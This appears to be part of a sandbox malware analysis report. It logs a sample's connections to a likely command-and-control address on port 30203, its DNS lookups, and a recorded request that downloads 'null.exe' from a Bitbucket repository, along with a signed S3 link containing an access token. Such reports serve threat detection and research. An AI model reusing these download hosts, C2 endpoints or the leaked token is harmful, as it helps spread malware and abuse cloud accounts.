                                                                                                                      Dec 12, 2024 17:33:14.313868046 CET5007230203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:14.434051991 CET3020350072181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:14.434102058 CET5007230203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:14.553931952 CET3020350072181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:14.973072052 CET3020350072181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:14.973134041 CET5007230203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:14.973337889 CET5007230203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:15.079668045 CET5007330203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:15.093221903 CET3020350072181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:15.200017929 CET3020350073181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:15.200126886 CET5007330203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:15.200674057 CET5007330203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:15.320734978 CET3020350073181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:15.326925039 CET5007330203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:15.447987080 CET3020350073181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:16.529067039 CET3020350073181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:16.529158115 CET5007330203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:16.529390097 CET5007330203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:16.642250061 CET5007430203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:16.649194956 CET3020350073181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:16.762546062 CET3020350074181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:16.762639999 CET5007430203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:16.763592958 CET5007430203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:16.883827925 CET3020350074181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:16.883928061 CET5007430203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:17.004544020 CET3020350074181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:18.477751017 CET3020350074181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:18.477814913 CET5007430203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:18.477978945 CET5007430203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:18.596071005 CET5007530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:18.597686052 CET3020350074181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:18.716041088 CET3020350075181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:18.716125011 CET5007530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:18.717133999 CET5007530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:18.840564013 CET3020350075181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:18.840635061 CET5007530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:18.961391926 CET3020350075181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:20.075417995 CET3020350075181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:20.075536013 CET5007530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:20.075721025 CET5007530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:20.188807964 CET5007630203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:20.196860075 CET3020350075181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:20.308681011 CET3020350076181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:20.308855057 CET5007630203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:20.309467077 CET5007630203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:20.429342031 CET3020350076181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:20.429418087 CET5007630203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:48.380079031 CET5009230203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:48.380276918 CET5009230203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:48.486213923 CET5009330203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:48.500149965 CET3020350092181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:48.606108904 CET3020350093181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:48.606190920 CET5009330203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:48.607487917 CET5009330203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:48.727349043 CET3020350093181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:48.727411032 CET5009330203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:48.847429991 CET3020350093181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:49.079730034 CET5009330203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:49.199768066 CET3020350093181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:49.200026989 CET5009330203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:49.320631027 CET3020350093181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:50.104000092 CET3020350093181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:50.104183912 CET5009330203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:50.104314089 CET5009330203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:50.220627069 CET5009430203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:50.225279093 CET3020350093181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:50.341669083 CET3020350094181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:50.341794014 CET5009430203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:50.342770100 CET5009430203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:50.462866068 CET3020350094181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:50.463062048 CET5009430203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:50.582950115 CET3020350094181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:51.771426916 CET3020350094181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:51.771740913 CET5009430203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:51.771858931 CET5009430203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:51.876389980 CET5009530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:51.891709089 CET3020350094181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:51.996685982 CET3020350095181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:51.997050047 CET5009530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:51.997719049 CET5009530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:52.117862940 CET3020350095181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:52.117993116 CET5009530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:52.237898111 CET3020350095181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:53.389195919 CET3020350095181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:53.389425993 CET5009530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:53.389601946 CET5009530203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:53.501523972 CET5009630203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:53.511085987 CET3020350095181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:53.622243881 CET3020350096181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:53.622375965 CET5009630203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:53.623344898 CET5009630203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:53.743725061 CET3020350096181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:53.743849993 CET5009630203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:53.865520000 CET3020350096181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:53.865669012 CET5009630203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:53.985460043 CET3020350096181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:55.284508944 CET3020350096181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:55.284576893 CET5009630203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:55.284801006 CET5009630203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:55.392071009 CET5009730203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:55.404582024 CET3020350096181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:55.512144089 CET3020350097181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:55.514413118 CET5009730203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:55.515309095 CET5009730203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:55.635138988 CET3020350097181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:55.635220051 CET5009730203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:55.755068064 CET3020350097181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:56.830874920 CET3020350097181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:56.831001997 CET5009730203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:56.831115961 CET5009730203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:56.939431906 CET5009830203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:56.951503992 CET3020350097181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:57.059604883 CET3020350098181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:57.059775114 CET5009830203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:57.060704947 CET5009830203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:57.180422068 CET3020350098181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:57.180639029 CET5009830203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:57.300494909 CET3020350098181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:57.689409018 CET5009830203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:57.809446096 CET3020350098181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:57.809530020 CET5009830203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:57.929291010 CET3020350098181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:58.453821898 CET3020350098181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:58.453895092 CET5009830203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:58.454116106 CET5009830203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:58.564126968 CET5009930203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:58.573754072 CET3020350098181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:58.683967113 CET3020350099181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:58.684063911 CET5009930203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:58.685112953 CET5009930203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:58.805427074 CET3020350099181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:33:58.805475950 CET5009930203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:33:58.925786972 CET3020350099181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:00.047749043 CET3020350099181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:00.048321009 CET5009930203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:00.048588037 CET5009930203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:00.159202099 CET5010030203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:00.169020891 CET3020350099181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:00.279472113 CET3020350100181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:00.279627085 CET5010030203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:00.283340931 CET5010030203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:00.403609037 CET3020350100181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:00.403785944 CET5010030203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:00.525660038 CET3020350100181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:01.746926069 CET3020350100181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:01.753767967 CET5010030203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:01.753767967 CET5010030203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:01.875463009 CET3020350100181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:01.891680956 CET5010130203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:02.012415886 CET3020350101181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:02.012535095 CET5010130203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:02.013243914 CET5010130203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:02.135426998 CET3020350101181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:02.135515928 CET5010130203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:02.255270958 CET3020350101181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:03.460623980 CET3020350101181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:03.465115070 CET5010130203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:03.465116024 CET5010130203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:03.583332062 CET5010230203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:03.584830046 CET3020350101181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:03.703114033 CET3020350102181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:03.704171896 CET5010230203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:03.704251051 CET5010230203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:03.824204922 CET3020350102181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:03.826872110 CET5010230203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:03.947052956 CET3020350102181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:05.090313911 CET3020350102181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:05.090378046 CET5010230203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:05.090609074 CET5010230203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:05.205020905 CET5010330203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:05.210458994 CET3020350102181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:05.325190067 CET3020350103181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:05.325273991 CET5010330203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:05.326471090 CET5010330203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:05.446674109 CET3020350103181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:05.449979067 CET5010330203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:05.569827080 CET3020350103181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:06.691329956 CET3020350103181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:06.691407919 CET5010330203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:06.691591024 CET5010330203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:06.798733950 CET5010430203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:06.811333895 CET3020350103181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:06.918576956 CET3020350104181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:06.918657064 CET5010430203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:06.919905901 CET5010430203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:07.039901972 CET3020350104181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:07.040307999 CET5010430203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:07.160191059 CET3020350104181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:07.361063957 CET5010430203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:07.481874943 CET3020350104181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:07.482012987 CET5010430203192.168.2.10181.131.217.244
                                                                                                                      Dec 12, 2024 17:34:07.602551937 CET3020350104181.131.217.244192.168.2.10
                                                                                                                      Dec 12, 2024 17:34:08.498171091 CET3020350104181.131.217.244192.168.2.10
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 12, 2024 17:30:35.365287066 CET | 59701 | 53 | 192.168.2.10 | 1.1.1.1
Dec 12, 2024 17:30:35.503216982 CET | 53 | 59701 | 1.1.1.1 | 192.168.2.10
Dec 12, 2024 17:30:37.697119951 CET | 61396 | 53 | 192.168.2.10 | 1.1.1.1
Dec 12, 2024 17:30:37.842211962 CET | 53 | 61396 | 1.1.1.1 | 192.168.2.10
Dec 12, 2024 17:30:40.022464037 CET | 56198 | 53 | 192.168.2.10 | 1.1.1.1
Dec 12, 2024 17:30:40.433372974 CET | 53 | 56198 | 1.1.1.1 | 192.168.2.10
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 12, 2024 17:30:35.365287066 CET | 192.168.2.10 | 1.1.1.1 | 0xc51a | Standard query (0) | navegacionseguracol24vip.org | A (IP address) | IN (0x0001) | false
Dec 12, 2024 17:30:37.697119951 CET | 192.168.2.10 | 1.1.1.1 | 0x373a | Standard query (0) | bitbucket.org | A (IP address) | IN (0x0001) | false
Dec 12, 2024 17:30:40.022464037 CET | 192.168.2.10 | 1.1.1.1 | 0x56bb | Standard query (0) | bbuseruploads.s3.amazonaws.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 12, 2024 17:30:09.965142012 CET | 1.1.1.1 | 192.168.2.10 | 0x6203 | No error (0) | shed.dual-low.s-part-0035.t-0009.t-msedge.net | s-part-0035.t-0009.t-msedge.net | | CNAME (Canonical name) | IN (0x0001) | false
Dec 12, 2024 17:30:09.965142012 CET | 1.1.1.1 | 192.168.2.10 | 0x6203 | No error (0) | s-part-0035.t-0009.t-msedge.net | | 13.107.246.63 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 17:30:35.503216982 CET | 1.1.1.1 | 192.168.2.10 | 0xc51a | No error (0) | navegacionseguracol24vip.org | | 181.131.217.244 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 17:30:37.842211962 CET | 1.1.1.1 | 192.168.2.10 | 0x373a | No error (0) | bitbucket.org | | 185.166.143.50 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 17:30:37.842211962 CET | 1.1.1.1 | 192.168.2.10 | 0x373a | No error (0) | bitbucket.org | | 185.166.143.48 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 17:30:37.842211962 CET | 1.1.1.1 | 192.168.2.10 | 0x373a | No error (0) | bitbucket.org | | 185.166.143.49 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 17:30:40.433372974 CET | 1.1.1.1 | 192.168.2.10 | 0x56bb | No error (0) | bbuseruploads.s3.amazonaws.com | s3-1-w.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 12, 2024 17:30:40.433372974 CET | 1.1.1.1 | 192.168.2.10 | 0x56bb | No error (0) | s3-1-w.amazonaws.com | s3-w.us-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 12, 2024 17:30:40.433372974 CET | 1.1.1.1 | 192.168.2.10 | 0x56bb | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.28.146 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 17:30:40.433372974 CET | 1.1.1.1 | 192.168.2.10 | 0x56bb | No error (0) | s3-w.us-east-1.amazonaws.com | | 3.5.27.151 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 17:30:40.433372974 CET | 1.1.1.1 | 192.168.2.10 | 0x56bb | No error (0) | s3-w.us-east-1.amazonaws.com | | 54.231.195.25 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 17:30:40.433372974 CET | 1.1.1.1 | 192.168.2.10 | 0x56bb | No error (0) | s3-w.us-east-1.amazonaws.com | | 54.231.161.209 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 17:30:40.433372974 CET | 1.1.1.1 | 192.168.2.10 | 0x56bb | No error (0) | s3-w.us-east-1.amazonaws.com | | 52.216.60.49 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 17:30:40.433372974 CET | 1.1.1.1 | 192.168.2.10 | 0x56bb | No error (0) | s3-w.us-east-1.amazonaws.com | | 16.182.106.41 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 17:30:40.433372974 CET | 1.1.1.1 | 192.168.2.10 | 0x56bb | No error (0) | s3-w.us-east-1.amazonaws.com | | 16.182.105.73 | A (IP address) | IN (0x0001) | false
Dec 12, 2024 17:30:40.433372974 CET | 1.1.1.1 | 192.168.2.10 | 0x56bb | No error (0) | s3-w.us-east-1.amazonaws.com | | 16.15.177.80 | A (IP address) | IN (0x0001) | false
                                                                                                                      • bitbucket.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49768 | 185.166.143.50 | 443 | 5980 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-12 16:30:39 UTC | 101 | OUT | GET /facturacioncol/fact/downloads/null.exe HTTP/1.1
Host: bitbucket.org
Connection: Keep-Alive
2024-12-12 16:30:39 UTC | 5949 | IN | HTTP/1.1 302 Found
                                                                                                                      Date: Thu, 12 Dec 2024 16:30:39 GMT
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Content-Length: 0
                                                                                                                      Server: AtlassianEdge
                                                                                                                      Location: https://bbuseruploads.s3.amazonaws.com/986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-40cc-a367-13b7035db3ac/null.exe?response-content-disposition=attachment%3B%20filename%3D%22null.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIGUX6ORX&Signature=Zjqmry%2BNGZ5szyFv0hOwnpTu2lo%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJIMEYCIQCGK9zub4%2FRHXDXeMN6k7XbjWwi0RJXwId9Ng33n0K%2F8QIhAN1Z2SPiS2gBnFaWWj6eia3uOu6PtMwycvP14HCcOT8YKrACCML%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEQABoMOTg0NTI1MTAxMTQ2IgwcdwWUJNKUMa%2FVym4qhALnixtfvkFlXAR1WJ687dROjrNTrlqec61HZk4xyIIbcd%2BRgXd%2Fh168iQ4%2BTw9BMZ81Zwv1RSJSVyNitKiXJcfIQRolpUMKdiNxfFyyqqcS0Tg2S3lJkWed%2BtKsHpen1E%2FDAnwDyxdvLayliINqWRXGDW9o6tVJBmDEqSXaOt6hqwZ%2FZha79%2Ff8W3BbEbePj2r6gzjnKKD7c1Ovt6LbwVJN%2B9jBhD2fyIBe5Lh3ZNbIVl4daY0oFLDS4VVAIEjburQUN4QSd7FkqlJhmbW3zmDwMI5%2Fb2gCZabQeQoSAb8VczrPcqmysGUiRjzARXLheXFHYDegGiflUK0oIiw2VGfaVRixBDCWnOy6BjqcARFHPbVaro%2BtHveeLvVVaDflun9rRVYAEJEvIZ58bqvNw79lxq2jSq9Ozh3SUPLz%2B6oHkYiGFJsYRa7HJIWuZdD%2FxHsyV%2BkzTZEx49KbjWL [TRUNCATED]
                                                                                                                      Expires: Thu, 12 Dec 2024 16:30:39 GMT
                                                                                                                      Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private
                                                                                                                      X-Used-Mesh: False
                                                                                                                      Vary: Accept-Language, Origin
                                                                                                                      Content-Language: en
                                                                                                                      X-View-Name: bitbucket.apps.downloads.views.download_file
                                                                                                                      X-Dc-Location: Micros-3
                                                                                                                      X-Served-By: 2da364c2065e
                                                                                                                      X-Version: b7875da02c7c
                                                                                                                      X-Static-Version: b7875da02c7c
                                                                                                                      X-Request-Count: 3516
                                                                                                                      X-Render-Time: 0.04372715950012207
                                                                                                                      X-B3-Traceid: d73e5483b2114867a34869692b0400ca
                                                                                                                      X-B3-Spanid: c05b9192f744638b
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      Content-Security-Policy: object-src 'none'; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; connect-src bitbucket.org *.bitbucket.org bb-inf.net *.bb-inf.net atlassianblog.wpengine.com id.atlassian.com api.atlassian.com api.stg.atlassian.com wss://bitbucketci-ws-service.services.atlassian.com/ wss://bitbucketci-ws-service.stg.services.atlassian.com/ wss://bitbucketci-ws-service.dev.services.atlassian.com/ analytics.atlassian.com atlassian-cookies--categories.us-east-1. [TRUNCATED]
                                                                                                                      X-Usage-Quota-Remaining: 999097.938
                                                                                                                      X-Usage-Request-Cost: 914.67
                                                                                                                      X-Usage-User-Time: 0.027440
                                                                                                                      X-Usage-System-Time: 0.000000
                                                                                                                      X-Usage-Input-Ops: 0
                                                                                                                      X-Usage-Output-Ops: 0
                                                                                                                      Age: 0
                                                                                                                      X-Cache: MISS
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      X-Xss-Protection: 1; mode=block
                                                                                                                      Atl-Traceid: d73e5483b2114867a34869692b0400ca
                                                                                                                      Atl-Request-Id: d73e5483-b211-4867-a348-69692b0400ca
                                                                                                                      Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                                                      Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                                                      Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                                                      Server-Timing: atl-edge;dur=153,atl-edge-internal;dur=3,atl-edge-upstream;dur=150,atl-edge-pop;desc="aws-eu-central-1"
                                                                                                                      Connection: close



                                                                                                                      Target ID:0
                                                                                                                      Start time:11:30:12
                                                                                                                      Start date:12/12/2024
                                                                                                                      Path:C:\Users\user\Desktop\3XSXmrEOw7.exe
                                                                                                                      Wow64 process (32bit):true
                                                                                                                      Commandline:"C:\Users\user\Desktop\3XSXmrEOw7.exe"
                                                                                                                      Imagebase:0x400000
                                                                                                                      File size:2'605'056 bytes
                                                                                                                      MD5 hash:DDCE3B9704D1E4236548B1A458317DD0
                                                                                                                      Has elevated privileges:true
                                                                                                                      Has administrator privileges:true
                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                      Reputation:low
                                                                                                                      Has exited:true

                                                                                                                      Target ID:3
                                                                                                                      Start time:11:30:30
                                                                                                                      Start date:12/12/2024
                                                                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
